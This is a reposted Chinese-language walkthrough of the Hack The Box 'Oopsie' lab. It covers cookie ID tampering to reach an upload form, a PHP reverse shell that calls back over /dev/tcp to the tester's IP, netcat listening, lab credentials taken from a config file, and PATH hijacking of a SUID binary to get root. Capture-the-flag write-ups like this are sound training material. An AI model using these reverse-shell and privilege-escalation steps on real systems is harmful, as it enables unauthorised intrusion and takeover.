『Hack The Box』Oopsie

Posted Ho1aAs

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了『Hack The Box』Oopsie相关的知识,希望对你有一定的参考价值。

前言

操作基于Kali 2020,参照官方wp

解题

信息搜集

nmap扫描

nmap -sS -A 10.10.10.28

扫出一个ssh和apache

访问apache80

浏览器访问一下80康康

F12审查元素和Network

发现有一个cdn-cgi/login/,应该是一个登录界面

上一道题知道了管理员密码是MEGACORP_4dm1n!!,试试登录

(这步是看了wp才知道的,与上一题联系)

进去以后,很显眼就是upload

提示要superadmin才能上传

还有一个值得注意,account用户列表

进去康康,发现了id,似乎可穷举爆一下

bp也可以发现,这个AccessID就是cookie识别身份的

爆出来AccessID是86575

改一下cookie,直接访问upload

反弹shell

传个php反弹shell,ip是Kali的,端口自定义

<?php
  exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.xx/xxxx 0<&1 '");
?>

用dirsearch扫一下上传到的目录

python3 dirsearch.py -u http://10.10.10.28 -e *

起一个监听

nc -lvnp 4444

浏览器访问uploads/1.php,nc可以执行命令

切换到tty

切到tty才能获得一个交互式的shell

SHELL=/bin/bash script -q /dev/null

如果不切换的话,例如输入密码是无法执行的

User Owns Flag

flag在用户文件夹内

查看www源码

找到一个数据库连接文件

cat读取

切换用户

在找用户flag的时候已经发现了同名的账户,这个应该是密码,切换一下用户

su robert
M3g4C0rpUs3r!

id查看一下用户组信息

发现一个奇怪的用户组,穷举找该组的特权命令,把permission denied的报错丢了

find / -type f -group bugtracker 2>/dev/null

用strings看一下这个二进制文件的内容

strings /usr/bin/bugtracker

这个程序运行的时候调用了root的cat,如果把cat的路径修改成运行bash,就能够获得root shell了

tmp文件夹一般有所有的权限,在下面新建一个cat,并指向bash

cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH

接下来运行这个bugtracker就会进入root shell了

/usr/bin/bugtracker

System Owns Flag

flag在root用户文件夹内

cat /root/root.txt

以上是关于『Hack The Box』Oopsie的主要内容,如果未能解决你的问题,请参考以下文章

Hack The Box - Sauna

Hack The Box

[Hack The Box]靶机5 Netmon

Hack The Box Web Pentest 2019

[Hack The Box]靶机3 Lame

[Hack The Box]靶机4 Jerry